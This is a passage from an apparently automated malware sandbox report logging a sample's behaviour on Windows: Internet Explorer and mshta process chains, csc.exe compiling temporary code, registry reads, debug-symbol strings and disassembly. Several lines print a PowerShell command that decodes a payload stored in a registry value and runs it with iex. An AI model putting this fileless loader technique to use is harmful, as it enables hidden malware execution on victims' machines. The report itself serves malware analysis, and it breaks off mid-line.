            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6556 CREDAT:17410 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5988 CREDAT:17410 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4596 CREDAT:17410 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4596 CREDAT:82956 /prefetch:2Jump to behavior
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\qxfma03s\qxfma03s.cmdline'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\maejgtwh\maejgtwh.cmdline'
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESCC08.tmp' 'c:\Users\user\AppData\Local\Temp\qxfma03s\CSC9A61D8937933426B894F97C05C536C75.TMP'
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESDFCF.tmp' 'c:\Users\user\AppData\Local\Temp\maejgtwh\CSC5E7D34BFE3B047248BD36616B57FD91.TMP'
            Source: C:\Windows\explorer.exeProcess created: unknown unknown
            Source: C:\Windows\explorer.exeProcess created: unknown unknown
            Source: C:\Windows\explorer.exeProcess created: unknown unknown
            Source: C:\Windows\explorer.exeProcess created: unknown unknown
            Source: C:\Windows\explorer.exeProcess created: unknown unknown
            Source: C:\Windows\explorer.exeProcess created: unknown unknown
            Source: C:\Windows\explorer.exeProcess created: unknown unknown
            Source: C:\Windows\explorer.exeProcess created: unknown unknown
            Source: C:\Windows\explorer.exeProcess created: unknown unknown
            Source: C:\Windows\explorer.exeProcess created: unknown unknown
            Source: C:\Windows\explorer.exeProcess created: unknown unknown
            Source: C:\Windows\explorer.exeProcess created: unknown unknown
            Source: C:\Windows\explorer.exeProcess created: unknown unknown
            Source: C:\Windows\explorer.exeProcess created: unknown unknown
            Source: C:\Windows\explorer.exeProcess created: unknown unknown
            Source: C:\Windows\explorer.exeProcess created: unknown unknown
            Source: C:\Windows\explorer.exeProcess created: unknown unknown
            Source: C:\Windows\System32\control.exeProcess created: unknown unknown
            Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
            Source: C:\Windows\explorer.exeFile opened: C:\Windows\SYSTEM32\msftedit.dll
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
            Source: C:\Windows\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dllJump to behavior
            Source: Binary string: powrprof.pdbG source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000004.00000003.646924434.0000000003165000.00000004.00000001.sdmp
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\maejgtwh\maejgtwh.pdb source: powershell.exe, 0000001E.00000002.910551161.0000026F5EBFA000.00000004.00000001.sdmp
            Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: sfc_os.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
            Source: Binary string: version.pdb{ source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp
            Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
            Source: Binary string: wntdll.pdb source: WerFault.exe, 00000004.00000003.646920068.000000000315F000.00000004.00000001.sdmp
            Source: Binary string: wimm32.pdb} source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: shcore.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
            Source: Binary string: combase.pdbQ source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp
            Source: Binary string: advapi32.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: fltLib.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: shell32.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
            Source: Binary string: msvcp_win.pdbk source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
            Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 00000021.00000002.845354069.000001CB4A4D0000.00000002.00000001.sdmp, csc.exe, 00000023.00000002.855076730.000002D3EE650000.00000002.00000001.sdmp
            Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
            Source: Binary string: fltLib.pdbM source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp
            Source: Binary string: wimm32.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: mpr.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
            Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp
            Source: Binary string: setupapi.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: iphlpapi.pdbe source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: imagehlp.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: dwmapi.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000004.00000003.646920068.000000000315F000.00000004.00000001.sdmp
            Source: Binary string: shcore.pdbk source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
            Source: Binary string: profapi.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: winspool.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp
            Source: Binary string: shell32.pdbk source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
            Source: Binary string: oleaut32.pdbc source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: sechost.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\qxfma03s\qxfma03s.pdbXPS source: powershell.exe, 0000001E.00000002.910551161.0000026F5EBFA000.00000004.00000001.sdmp
            Source: Binary string: propsys.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
            Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.863977808.0000000005670000.00000004.00000001.sdmp
            Source: Binary string: bcrypt.pdb_ source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
            Source: Binary string: powrprof.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: msctf.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: ole32.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: version.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: AcLayers.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp
            Source: Binary string: wsspicli.pdbi source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: sfc_os.pdbGX source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: dwmapi.pdbm source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\maejgtwh\maejgtwh.pdbXPS source: powershell.exe, 0000001E.00000002.910665056.0000026F5EC2E000.00000004.00000001.sdmp
            Source: Binary string: sechost.pdbw source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: shlwapi.pdbK source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\qxfma03s\qxfma03s.pdb source: powershell.exe, 0000001E.00000002.910375555.0000026F5EBB6000.00000004.00000001.sdmp
            Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: comctl32v582.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000004.00000003.647057880.000000000316B000.00000004.00000001.sdmp
            Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
            Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
            Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.863977808.0000000005670000.00000004.00000001.sdmp
            Source: Binary string: combase.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
            Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000004.00000003.646924434.0000000003165000.00000004.00000001.sdmp
            Source: Binary string: rundll32.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp
            Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: sfc.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: apphelp.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp
            Source: Binary string: wuser32.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp
            Source: Binary string: comctl32.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp

            Data Obfuscation:

            barindex
            Suspicious powershell command line foundShow sources
            Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\qxfma03s\qxfma03s.cmdline'
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\maejgtwh\maejgtwh.cmdline'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\qxfma03s\qxfma03s.cmdline'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\maejgtwh\maejgtwh.cmdline'
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0042743C LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0042743C
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00453E60 push 00453EEDh; ret 0_2_00453EE5
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00406040 push 0040606Ch; ret 0_2_00406064
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_004160F0 push ecx; mov dword ptr [esp], edx0_2_004160F5
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00418174 push ecx; mov dword ptr [esp], ecx0_2_00418179
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00414104 push 00414151h; ret 0_2_00414149
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00416134 push ecx; mov dword ptr [esp], edx0_2_00416139
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_004143CF push 004144A8h; ret 0_2_004144A0
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0041447C push 004144A8h; ret 0_2_004144A0
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00428404 push 0042845Dh; ret 0_2_00428455
            Source: C:\Windows\